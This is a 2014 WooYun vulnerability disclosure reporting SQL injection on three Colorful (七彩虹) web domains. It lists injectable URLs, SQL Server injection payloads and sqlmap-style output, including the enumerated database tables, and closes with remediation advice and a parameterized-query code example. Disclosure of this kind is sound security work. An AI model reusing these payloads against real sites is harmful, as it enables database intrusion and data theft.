
Defect ID: wooyun-2014-059298

Title: SQL injection vulnerability on the Colorful (七彩虹) official website

Vendor: 七彩虹 (Colorful)

Author: 路人甲

Submitted: 2014-05-03 20:52

Fix deadline: 2014-06-17 20:52

Published: 2014-06-17 20:52

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-05-03: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-06-17: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL

Detailed description:

-----------------------------------------------------------------------------
0@sec: The vulnerability exists on three domains
www.colorful.cn
admin.colorful.cn
m.colorful.cn
-----------------------------------------------------------------------------
1@sec: SQL injection (the detection output below identifies the back end as Microsoft SQL Server)
-----------------------------------------------------------------------------
http://www.colorful.cn/ColorfulAwards.aspx?colorfulid=4&Time=2013 (Time parameter)
http://www.colorful.cn/ColorfulNetwork_product.aspx?Cataid=12101509594818660dc6d78062fef4d73a8b
http://www.colorful.cn/JishuList.aspx?id=12101509594818660dc6d78062fef4d73a8b
http://www.colorful.cn/ColorfulNewDetails.aspx?id=1312c321776344fe4975917d082db085326b
http://www.colorful.cn/ColorfulProductdetails.aspx?id=130781bbf68a799442b6b7183b642caca75a (id parameter)
-----------------------------------------------------------------------------
http://admin.colorful.cn/Common/ShowMobileImage.ashx?id=1404f2e9c238627c4b05a82aa0069108b6f0
http://admin.colorful.cn/Common/ShowImage.ashx?id=1307f25a656aa4ea45838d73e64b1ead6602
http://admin.colorful.cn/Common/ShowImage.ashx?id=13125b9f760c3a9742629e752fb4b9b2d46c&width=55&height=55 (parameter id=13125b9f760c3a9742629e752fb4b9b2d46c)
-----------------------------------------------------------------------------
http://m.colorful.cn/NewDetails.aspx?id=1312c321776344fe4975917d082db085326b
http://m.colorful.cn/ColorfulAwards.aspx?colorfulid=4
http://m.colorful.cn/ColorfulAwards.aspx?Time=2013
http://m.colorful.cn/ProductDetails.aspx?id=13080918d7c248a04845925d64d040587611&CataId=1210091043471234035ab2610de009ec8235
http://m.colorful.cn/ProductDetails.aspx?id=668f8384-0685-4a70-895c-8f9eb39db020
-----------------------------------------------------------------------------

Proof of vulnerability:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1312c321776344fe4975917d082db085326b' AND 2500=2500 AND 'uzXS'='uzXS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1312c321776344fe4975917d082db085326b'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1312c321776344fe4975917d082db085326b' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user: 'ColorfulWebUser'


Place: GET
Parameter: Time
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: colorfulid=4&Time=2013' AND 8193=8193 AND 'lNpP'='lNpP
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: colorfulid=4&Time=2013' AND 3542=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (3542=3542) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(112)+CHAR(113))) AND 'rmZW'='rmZW
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: colorfulid=4&Time=2013' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(100)+CHAR(113)+CHAR(83)+CHAR(83)+CHAR(119)+CHAR(100)+CHAR(98)+CHAR(120)+CHAR(116)+CHAR(99)+CHAR(104)+CHAR(112)+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(112)+CHAR(113),NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: colorfulid=4&Time=2013'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: colorfulid=4&Time=2013' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'ColorfulWeb'


Database: ColorfulWeb
[49 tables]
+-----------------------------+
| B_ResouceInfo |
| D99_Tmp |
| I_Credit |
| I_News |
| I_Recruit |
| I_SuccessfulCase |
| I_SwitchImages |
| I_SwitchSettings |
| LeiFeng_Relation |
| NPA_Parameters |
| NPA_Product |
| P_DownloadFiles |
| P_DownloadInfo |
| P_DownloadType |
| P_ProductBrand |
| P_ProductCataLog |
| P_ProductDownLoadRelation |
| P_ProductImages |
| P_ProductInfo |
| P_ProductIntroduce |
| P_ProductParameter |
| P_ProductParameterVal |
| P_ProductRoot |
| P_ProductSeries |
| P_ProductSeriesRelation |
| P_ProductTechnical |
| P_ProductTechnicalRelation |
| R_GroupRight |
| R_ModuleFunctions |
| R_ModuleFunctions |
| R_UserGroup |
| R_Users |
| SP_CellElements |
| SP_ColorSeries |
| SP_SpecialSubject2 |
| SP_SpecialSubject2 |
| SP_SubjectCells |
| SP_SubjectMessage |
| SP_Templet |
| SYS_LinkURL |
| SYS_Statistics |
| SubjectMessage_View |
| VW_LeiFengProductParameters |
| VW_ProductInfo |
| VW_SP_SpecialSubject |
| dtest |
| sysdiagrams |
| vwGetGroupRight |
| vwGetNoneGroupRight |
+-----------------------------+

Remediation:

Validate and filter parameters such as id and Time before they reach the database query, or apply a whitelist policy to them.

Copyright notice: when reposting, please credit the source: 路人甲@乌云
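As an added illustration of that remediation (this code is not from the report or from the vendor's site), the following ASP.NET/C# snippet shows the concatenation pattern behind this bug class next to a hardened version that whitelists the id and Time values and passes them to SQL Server as bound parameters; the column names ProductId, ProductName and AwardYear are assumed placeholders.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class ColorfulQueries
{
    // Whitelist for the id values seen on the site: 36 hex characters or a GUID.
    static readonly Regex HexId = new Regex("^[0-9a-fA-F]{36}$", RegexOptions.Compiled);

    public static bool IsValidId(string id) =>
        id != null && (HexId.IsMatch(id) || Guid.TryParse(id, out _));

    // Whitelist for Time: a plain four-digit year, nothing else gets through.
    public static bool TryParseYear(string time, out int year) =>
        int.TryParse(time, out year) && year >= 2000 && year <= 2100;

    // VULNERABLE pattern (the bug class in this report): the raw request value is
    // spliced into the SQL text, so a single quote terminates the string literal
    // and the rest of the value is executed as SQL.
    public static string BuildUnsafeQuery(string id) =>
        "SELECT ProductName FROM P_ProductInfo WHERE ProductId = '" + id + "'";

    // Hardened: reject anything outside the whitelist, then bind the value as a
    // typed parameter. The driver ships it separately from the query text, so the
    // value can never alter the statement's structure.
    public static DataTable GetProduct(SqlConnection conn, string id)
    {
        if (!IsValidId(id))
            throw new ArgumentException("rejected product id");  // assumed column names
        using (var cmd = new SqlCommand(
            "SELECT ProductName FROM P_ProductInfo WHERE ProductId = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.VarChar, 36).Value = id;
            var table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table);
            return table;
        }
    }

    public static DataTable GetAwards(SqlConnection conn, string time)
    {
        if (!TryParseYear(time, out int year))
            throw new ArgumentException("rejected Time value");
        using (var cmd = new SqlCommand(
            "SELECT ProductName FROM P_ProductInfo WHERE AwardYear = @year", conn))
        {
            cmd.Parameters.Add("@year", SqlDbType.Int).Value = year;  // int, not text
            var table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table);
            return table;
        }
    }
}
```

With this in place, a value such as 2013' WAITFOR DELAY '0:0:5'-- fails TryParseYear and never reaches SQL Server; even a value that passed validation would arrive as data, not as part of the statement.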


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined the report